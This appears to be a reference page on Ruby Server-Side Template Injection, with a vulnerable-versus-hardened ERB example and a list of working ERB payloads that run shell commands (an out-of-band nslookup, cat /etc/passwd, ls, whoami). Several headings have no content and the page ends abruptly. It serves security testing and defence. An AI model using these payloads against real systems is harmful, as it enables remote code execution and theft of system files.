Server Side Template Injection - Ruby
Server-Side Template Injection (SSTI) is a vulnerability that arises when attacker-controlled input is treated as part of a server-side template rather than as data, so the template engine evaluates it on the server; this typically escalates to arbitrary code execution. In Ruby, SSTI can occur with templating engines such as ERB (Embedded Ruby), Haml, Liquid, or Slim whenever user input is concatenated into the template source instead of being passed to the template as a variable.
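As an added example (not code from the original page), the vulnerable ERB pattern beside its hardened form. The only input used is the harmless `<%= 7 * 7 %>` probe, constructed here to show whether the engine evaluates the input or renders it as text.

```ruby
require 'erb'

# Constructed example input: a harmless ERB expression of the <%= %> form
# listed for ERB in the table below. It is used only to demonstrate the
# difference between evaluating input as a template and treating it as data.
PROBE = '<%= 7 * 7 %>'

# VULNERABLE: the user-supplied string is interpolated into the template
# source, so any <%= %> tag it contains is evaluated on the server with the
# full power of Ruby.
def render_vulnerable(user_input)
  ERB.new("Hello, #{user_input}!").result(binding)
end

# HARDENED: the template is a fixed string owned by the application and the
# user input is passed in as a template variable. ERB never parses tags that
# arrive inside data, and ERB::Util.html_escape also makes the value safe to
# embed in HTML output.
SAFE_TEMPLATE = 'Hello, <%= ERB::Util.html_escape(name) %>!'

def render_safe(user_input)
  ERB.new(SAFE_TEMPLATE).result_with_hash(name: user_input)
end

if __FILE__ == $PROGRAM_NAME
  puts render_vulnerable(PROBE)  # Hello, 49!  (the expression was evaluated)
  puts render_safe(PROBE)        # Hello, &lt;%= 7 * 7 %&gt;!  (rendered as text)
end
```

If the rendered page shows the arithmetic result instead of the literal tag, input is reaching the template source and the render path needs the second form.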
Summary
Templating Libraries
| Template Name | Payload Format |
|---|---|
| Erb | `<%= %>` |
| Erubi | `<%= %>` |
| Erubis | `<%= %>` |
| HAML | `#{ }` |
| Liquid | `{{ }}` |
| Mustache | `{{ }}` |
| Slim | `#{ }` |
Ruby
Ruby - Basic injections
ERB:
Slim:
Ruby - Retrieve /etc/passwd
Ruby - List files and directories
Ruby - Remote Command execution
Execute code using SSTI with the Erb, Erubi, or Erubis engine.

```erb
<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```
Execute code using SSTI for Slim engine.